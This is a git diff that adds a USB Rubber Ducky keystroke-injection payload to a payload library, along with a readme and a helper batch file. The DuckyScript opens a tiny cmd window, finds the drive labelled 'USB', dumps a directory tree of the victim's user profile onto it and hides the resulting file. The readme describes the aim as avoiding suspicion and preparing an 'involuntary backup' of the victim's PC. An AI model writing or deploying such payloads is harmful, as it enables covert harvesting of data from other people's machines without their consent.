diff --git a/library/payloads/recon/Tree_of_Knowledge/payload.txt b/library/payloads/recon/Tree_of_Knowledge/payload.txt new file mode 100644 index 0000000..9f1faca --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/payload.txt @@ -0,0 +1,13 @@ +REM Payload created by Alex007-CyberGuy +REM Check the readme.md file for more info on the payload and what is does. +DEFAULTDELAY 250 +DELAY 3000 +GUI r +DELAY 400 +STRING cmd /k "mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr "USB"') do set myd=%d&echo tree /a /f > echotree.cmd" +ENTER +DELAY 350 +STRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit +ENTER +ALT SPACE +STRING n \ No newline at end of file diff --git a/library/payloads/recon/Tree_of_Knowledge/readme.md b/library/payloads/recon/Tree_of_Knowledge/readme.md new file mode 100644 index 0000000..28b77dc --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/readme.md @@ -0,0 +1,26 @@ +# Tree of Knowledge + +## Intro +This payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky. +In order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run. +This whole process is relatively discreet, bug free and can run and finish in a matter of seconds. +This payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an "involuntary backup". + +## Requirements: +- Only works on Windows (7/8/8.1/10) +- Twin Duck firmware must be loaded +- The ducky must be labeled as "USB" + +## Viewing files +In order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it. + +## Troubleshooting +1. Experiment with those delays. +2. Make sure that you don't already have a recon file saved from that computer. +3. ALT SPACE doesn't work on some encoders. Try using the java based encoder. + +### Tip +The inject.bin still works even if it is marked as "hidden". + +That's it folks! +I spent quite long in order optimise this payload, so enjoy! diff --git a/library/payloads/recon/Tree_of_Knowledge/show.bat b/library/payloads/recon/Tree_of_Knowledge/show.bat new file mode 100644 index 0000000..d6bf5cd --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/show.bat @@ -0,0 +1,2 @@ +echo off: +attrib *.txt -h /s /d \ No newline at end of file